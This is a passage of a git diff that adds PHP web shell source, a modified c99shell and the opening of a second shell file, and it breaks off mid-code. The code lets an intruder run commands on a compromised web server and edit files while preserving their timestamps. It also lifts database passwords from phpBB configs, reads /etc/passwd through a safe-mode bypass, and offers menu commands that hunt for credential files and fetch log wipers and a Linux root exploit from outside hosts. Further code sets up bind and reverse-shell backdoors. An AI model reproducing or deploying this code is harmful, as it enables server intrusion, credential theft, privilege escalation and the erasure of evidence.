+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top"><center><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><br/><b>Local Command:</b> <input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><br/>
+    <b> Quick Commands </b></div>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+        <input type=hidden name=act value="cmd">
+        <input type=hidden name="d" value="<?php echo $dispd; ?>">
+         <SELECT NAME="cmd">
+		 <OPTION VALUE="#"> [File Manipulation]
+		 <OPTION VALUE="">                   
+		 <OPTION VALUE="lsattr -va">List file attributes on a Linux second extended file system
+		 <OPTION VALUE="find / -type f -perm -04000 -ls">Find suid files
+           <OPTION VALUE="find . -type f -perm -04000 -ls">Find suid files in current directory
+           <OPTION VALUE="find / -type f -perm -02000 -ls">Find sgid files
+           <OPTION VALUE="find . -type f -perm -02000 -ls">Find sgid files in current directory
+		    <OPTION VALUE="ls -lia">List you current directory's files, folders, & permissions
+			 <OPTION VALUE="find / -type f -name config.inc.php">Find config.inc.php files
+             <OPTION VALUE="find . -type f -name config.inc.php">Find config.inc.php files in current directory
+             <OPTION VALUE="find / -type f -name "config*">Find config* files
+             <OPTION VALUE="find . -type f -name "config*">Find config* files in current directory
+              <OPTION VALUE="find / -type f -perm -2 -ls">Find all writable files
+             <OPTION VALUE="find . -type f -perm -2 -ls">Find all writable files in current directory
+             <OPTION VALUE="find / -perm -2 -ls">Find all writable directories and files
+	    	 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories and files in current directory
+			 <OPTION VALUE="find / -type f -name service.pwd">Find all service.pwd files
+			 <OPTION VALUE="find . -type f -name service.pwd">Find service.pwd files in current directory
+			 <OPTION VALUE="find / -type f -name .htpasswd">Find all .htpasswd files
+			 <OPTION VALUE="find . -type f -name .htpasswd">Find .htpasswd files in current directory
+			 <OPTION VALUE="find / -type f -name .bash_history">Find all .bash_history files
+			 <OPTION VALUE="find . -type f -name .bash_history">Find .bash_history files in current directory
+			 <OPTION VALUE="find / -type f -name .mysql_history">Find all .mysql_history files
+			<OPTION VALUE="find . -type f -name .mysql_history">Find .mysql_history files in current directory
+			 <OPTION VALUE="find / -type f -name .fetchmailrc">Find all .fetchmailrc files
+			<OPTION VALUE="find . -type f -name .fetchmailrc">Find .fetchmailrc files in current directory
+			<OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
+			<OPTION VALUE="">                   
+		<OPTION VALUE="#"> [Directory Malipulation]
+		<OPTION VALUE="">                  
+		<OPTION VALUE="pwd">List your current directory
+		<OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Is /etc/ writable?
+		<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="">                   
+<OPTION VALUE="#"> [Miscellaneous Commands]
+<OPTION VALUE="">                   
+           <OPTION VALUE="tar -cvf NEWTAR!!.tar -c <?php passthru('pwd'); ?>">Tar your current directory. (Only works if the directory is writable)
+  <OPTION VALUE="uname -a">Kernel version
+           <OPTION VALUE="w">Logged in users
+           <OPTION VALUE="lastlog">Last users to connect
+           <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
+           <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">Users without passwords
+            <OPTION VALUE="cat /proc/version /proc/cpuinfo">CpuInfo
+             <OPTION VALUE="netstat -atup | grep IST">Open ports    
+			 <OPTION VALUE="">                                     
+            <OPTION VALUE="#"> [Application Verification]
+			<OPTION VALUE="">                   
+            <OPTION VALUE="which wget curl w3m lynx">Check For Downloaders (WGET, et cetera)
+            <OPTION VALUE="locate gcc">Check For GCC
+			<OPTION VALUE="">                   
+		   <OPTION VALUE="#"> [Log Cleaners]
+		   <OPTION VALUE="">                   
+                    <OPTION VALUE="wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/logcleaner-0.3.c">Wipelogs (Part 1)(Zap3)
+                    <OPTION VALUE="gcc logcleaner-0.3.c -o logcleaner-0.3">Wipelogs (Part 2)(Zap3)
+                    <OPTION VALUE="./logcleaner-0.3 <? echo $_SERVER["REMOTE_ADDR"]; ?>">Wipelogs (Part 3)(Zap3)
+                    <OPTION VALUE="Gone!<? if($_REQUEST['cmd']=="Gone!") { if (file_exists("logcleaner-0.3.c")) { unlink("logcleaner-0.3.c"); } if (file_exists("logcleaner-0.3")) { unlink("logcleaner-0.3"); } } ?>">Remove All Zap3 Traces
+                   <OPTION VALUE="">  
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/vanish.c">Wipelogs (Part 1)(Vanish)
+                    <OPTION VALUE="gcc vanish.c -o vanish">Wipelogs (Part 2)(Vanish)
+                     <OPTION VALUE="./vanish <? echo exec('whoami'); ?> <? echo $_SERVER["REMOTE_ADDR"]; ?> <? echo gethostbyname($_SERVER["HTTP_HOST"]); ?>">Wipelogs (Part 3)(Vanish)
+                    <OPTION VALUE="Gone!!<? if($_REQUEST['cmd']=="Gone!!") { if (file_exists("vanish.c")) { unlink("vanish.c"); } if (file_exists("vanish")) { unlink("vanish"); } } ?>">Remove All Vanish Traces
+                   <OPTION VALUE=""> 
+                   <OPTION VALUE="#"> [Root Exploits]
+		   <OPTION VALUE=""> 
+                    <OPTION VALUE="wget http://www.synsta.templatez.org/1.txt">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 1)
+                   <OPTION VALUE="mv 1.txt exploit.c">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 2)
+                   <OPTION VALUE="gcc exploit.c -o exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 3)
+                   <OPTION VALUE="./exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 4)
+                   <OPTION VALUE="Gone!!!<? if($_REQUEST['cmd']=="Gone!!!") { if (file_exists("exploit.c")) { unlink("exploit.c"); } if (file_exists("1.txt")) { unlink("1.txt"); } if (file_exists("exploit")) { unlink("exploit"); } } ?>">Remove All Exploit Traces
+                    </SELECT>
+        
+        <input type=hidden name="cmd_txt" value="1">
+        &nbsp;
+        <input type=submit name=submit value="Execute"></div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+  <center><br/><b> Kernel Information </b>
+<form action=http://google.com/search name=f><input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en><input id=sf maxLength=256 name=q value="<?php echo wordwrap(php_uname()); ?>" size=80>
+&nbsp;
+<input type=submit value="Search" name=btnG></form>
+</center>
+    </td>
+</tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><strong>PHP Safe-Mode Bypass (Read Files)    </strong></div>
+    <br>
+    <form action="<?php echo $surl; ?>" method="post">
+      <div align="center">
+      File: <input type="text" name="file"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
+      <?php
+      function rsg_read()
+	{	
+	$test="";
+	$temp=tempnam($test, "cx");
+	$file=$_REQUEST['file'];	
+	$get=htmlspecialchars($file);
+	echo "</br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+	if(copy("compress.zlib://".$file, $temp)){
+	$fichier = fopen($temp, "r");
+	$action = fread($fichier, filesize($temp));
+	fclose($fichier);
+	$source=htmlspecialchars($action);
+
+
+	echo "<div class=\"shell\"></br><b>Reading $get:</b><br><br><textarea rows=10 cols=50>$source</textarea><br>";
+	unlink($temp);
+	} else {
+	echo("</br><FONT COLOR=\"RED\"><CENTER>Sorry... File
+	<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+	access.</CENTER></FONT>");
+			}
+	echo "</div>";
+	}
+	
+	if(isset($_REQUEST['file']))
+{
+rsg_read();
+}
+	
+	?>
+	
+	<?
+	
+	function rsg_glob()
+{
+$chemin=$_REQUEST['directory'];
+$files = glob("$chemin*");
+echo "</br>Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+	echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+}
+
+if(isset($_REQUEST['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          <br>
+      </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+     <strong>PHP Safe-Mode Bypass (List Directories)</strong>:     
+     <form action="<?php echo $surl; ?>" method="post">
+      <div align="center"><br>
+      Dir: <input type="text" name="directory"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
+
+    </form></center>
+    </td>
+</tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Search</b>
+   <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Upload</b>
+   <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b><strong>Create Directory
+  </strong>
+  <p><form action="<?php echo $PHP_SELF; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>
+    <strong>Create File </strong>
+    <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>Enter Directory </b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>
+    <b>Access File</b>
+    <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+</td>
+</tr>
+</TABLE>
+<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#333333 style="BORDER-COLLAPSE: collapse">
+  <tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell modded by <a href=http://w4ck1ng.com class="style1">w4ck1ng</a>. | <? echo("$shver"); ?> | Page generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</p></td></tr></table>
+<br/></body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/xakep-shells/PHP/wacking.php.php.txt b/xakep-shells/PHP/wacking.php.php.txt
new file mode 100644
index 0000000..d870490
--- /dev/null
+++ b/xakep-shells/PHP/wacking.php.php.txt
@@ -0,0 +1,2830 @@
+<?php
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
